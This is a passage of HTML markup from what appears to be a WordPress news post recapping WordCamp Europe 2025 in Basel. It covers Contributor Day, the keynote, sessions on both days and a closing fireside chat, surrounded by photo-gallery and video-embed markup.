https://i0.wp.com/wordpress.org/news/files/2025/06/54569220633_32194e94d5_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569220633_32194e94d5_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569220633_32194e94d5_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569220633_32194e94d5_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Jeroen Rotty</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695b19f&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695b19f\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18807\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569320070_03f700e2a1_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18807\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569320070_03f700e2a1_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569320070_03f700e2a1_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569320070_03f700e2a1_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569320070_03f700e2a1_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569320070_03f700e2a1_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Levente András Tóth</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695b46a&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695b46a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18808\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569320480_cc49061ebc_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18808\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569320480_cc49061ebc_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569320480_cc49061ebc_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569320480_cc49061ebc_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569320480_cc49061ebc_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569320480_cc49061ebc_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Sebastián Echeverri Jaramillo</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695b726&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695b726\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18809\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569323570_dfb78eb42f_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18809\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569323570_dfb78eb42f_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569323570_dfb78eb42f_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569323570_dfb78eb42f_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569323570_dfb78eb42f_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569323570_dfb78eb42f_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Thanh Nguyen</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695b9e8&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695b9e8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18810\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250605-WA0137-1.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18810\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250605-WA0137-1-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250605-WA0137-1-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250605-WA0137-1-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250605-WA0137-1-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250605-WA0137-1-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Nilo Velez</figcaption></figure>\n</figure>\n\n\n\n<p>Contributor Day at WordCamp Europe 2025 brought together a mix of first-time and returning contributors across a wide range of teams, from Core and Accessibility to Polyglots, Training, and Community. Attendees tackled everything from onboarding and ticket triage to translating strings, improving documentation, and enhancing tools and workflows. Development-focused teams explored performance and testing improvements and worked through live coding exercises. Meanwhile, accessibility testers, support volunteers, and photo moderators contributed to efforts that directly impact users around the world.</p>\n\n\n\n<p>In parallel, teams like Marketing, Meta, Hosting, and Sustainability focused on future-facing initiatives—from promoting WordPress through the Showcase and social media campaigns to refining infrastructure, increasing accessibility, and preparing for long-term project growth. Whether contributing to plugins, themes, documentation, or new contributor experiences, participants reinforced the values that power the WordPress project: collaboration, inclusivity, and openness. The day served as a reminder that WordPress is not just software—it’s a community built by and for everyone.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Tomorrow Starts with WordPress</h2>\n\n\n\n<p>The first full day of WordCamp Europe 2025 brought the community together to celebrate the power of open source collaboration and innovation. Opening remarks from both global and local event leads reflected on the journey of WordCamp Europe—from its beginnings in 2013 in Leiden, Netherlands, to the vibrant event in Basel today. This full-circle moment underscored the growth of the WordPress community, united by a shared commitment to an open web.</p>\n\n\n\n<p>The day launched into an inspiring program with the keynote session, <em>WordPress Without Borders – The Fight for Digital Freedom</em>, delivered by Noel Tock. Drawing from his experiences—including time on the frontlines in Ukraine—Tock illustrated how open source supports global resilience and serves as a digital human right. His message called on contributors to see their work as part of something greater, offering a compelling and forward-looking vision to energize and unify the WordPress community.</p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"WordPress without Borders — The Fight for Digital Freedom | Noel Tock\" width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/tb_A-ABehnY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe>\n</div></figure>\n\n\n\n<p>From there, the program unfolded across multiple tracks—each one sparking new conversations and insights. One standout session highlighted social entrepreneurship in Bulgaria, where WordPress is helping grassroots organizations drive change in education, journalism, and social justice. Petya Raykovska shared how nonprofits like Teenovator and the Bulgarian Fund for Women are using WordPress to amplify their work and strengthen their communities.</p>\n\n\n\n<p>Designers and developers explored ways to improve workflows and collaboration. In <em>Bridging Design and Development</em>, attendees learned how Figma Design Systems can connect design and development through shared structures mapped to block themes. Real-world examples, like the Novus Media Newspaper Design System, demonstrated how scalable, consistent design can power multi-brand platforms.</p>\n\n\n\n<p>Workshops played a key role throughout the day, including the interactive <em>Block Developer Cookbook: WCEU 2025 Edition</em>, where attendees worked through community-voted code recipes featuring the latest WordPress APIs. Sessions also dove into emerging technologies, such as <em>Automating WordPress Setup with Modern AI Tools</em>, which showcased how WP-CLI, scripting, and AI can accelerate project setup and reduce repetitive tasks.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571048139_5009fd3c2b_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18817\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571048139_5009fd3c2b_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571048139_5009fd3c2b_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571048139_5009fd3c2b_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571048139_5009fd3c2b_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571048139_5009fd3c2b_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><figcaption class=\"wp-element-caption\"><em>Photo by Marc Wieland</em></figcaption></figure>\n\n\n\n<p>Day Two of WordCamp Europe 2025 opened with a focus on the evolving role of the WordPress community in a rapidly changing digital world. Sessions explored how contributors—from local meetup organizers to global advocates—play a vital part in shaping WordPress’s future. Talks on inclusivity, such as <em>Over the Rainbow</em>, encouraged attendees to consider how individual actions can help build a more welcoming, representative open source ecosystem. Throughout the morning, the spirit of collaboration and shared purpose remained front and center.</p>\n\n\n\n<p>As the day progressed, attention turned to the tools and technologies pushing WordPress forward. From sessions on scaling multilingual sites and managing observability to hands-on workshops, developers explored new ways to streamline workflows and enhance performance. Highlights included <em>WordPress Gems for Devs</em>, which introduced the Interactivity API through live coding, and <em>Client-side Web AI Agents</em>, a look at cutting-edge browser-based AI that unlocks new possibilities for web experiences. These talks reflected the platform’s growing capacity to adapt to emerging trends while staying true to its open foundations.</p>\n\n\n\n<p>The afternoon brought a blend of practical guidance and inspiring stories across tracks. A case study on accessibility from Switzerland showed how thoughtful design can benefit all users, while a session on brand-building for women entrepreneurs highlighted the creative and economic opportunities WordPress enables. With topics spanning content strategy, business growth, regulatory readiness, and more, the second day of WCEU 2025 affirmed the strength of the WordPress ecosystem—not only as a technology platform, but as a global movement fueled by people, purpose, and possibility.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Fireside Chat</h2>\n\n\n\n<p>As the final day drew to a close, Matt and Mary shared some thoughts on EU regulation (Open Web Alliance), AI, and the introduction of the WordPress AI team, and then answered questions from the audience.</p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Fireside chat with Q&amp;A | Mary Hubbard and Matt Mullenweg\" width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/mzJwYejWUbY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe>\n</div></figure>\n\n\n\n<h2 class=\"wp-block-heading\">Closing</h2>\n\n\n\n<p>A heartfelt thank you to the dedicated organizers who brought WordCamp Europe 2025 to life in Basel, the speakers who shared their insights, the attendees who joined us in person, and those who followed along from afar. We hope you leave with fresh ideas, meaningful connections, and renewed energy to help shape the future of the open web.</p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-4 is-layout-flex wp-block-gallery-is-layout-flex\" style=\"border-width:20px\">\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695c120&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695c120\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18827\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571099103_b61e92651c_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18827\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571099103_b61e92651c_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571099103_b61e92651c_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571099103_b61e92651c_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571099103_b61e92651c_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571099103_b61e92651c_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Jeroen Rotty</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695c3e7&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695c3e7\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18825\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54570002952_63c3ced847_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18825\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54570002952_63c3ced847_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570002952_63c3ced847_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570002952_63c3ced847_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570002952_63c3ced847_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570002952_63c3ced847_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Chris Clarke</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695c6a9&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695c6a9\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18824\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569999382_839ad34def_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18824\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54569999382_839ad34def_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569999382_839ad34def_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569999382_839ad34def_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569999382_839ad34def_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54569999382_839ad34def_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Thanh Nguyen</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695c970&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695c970\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18823\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571194430_99b40d9280_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18823\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571194430_99b40d9280_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571194430_99b40d9280_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571194430_99b40d9280_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571194430_99b40d9280_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571194430_99b40d9280_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Thanh Nguyen</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695cc24&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695cc24\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"684\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18822\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571195715_0e2dbb778c_k.jpg?resize=1024%2C684&#038;ssl=1\" alt=\"\" class=\"wp-image-18822\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571195715_0e2dbb778c_k.jpg?resize=1024%2C684&amp;ssl=1 1024w, 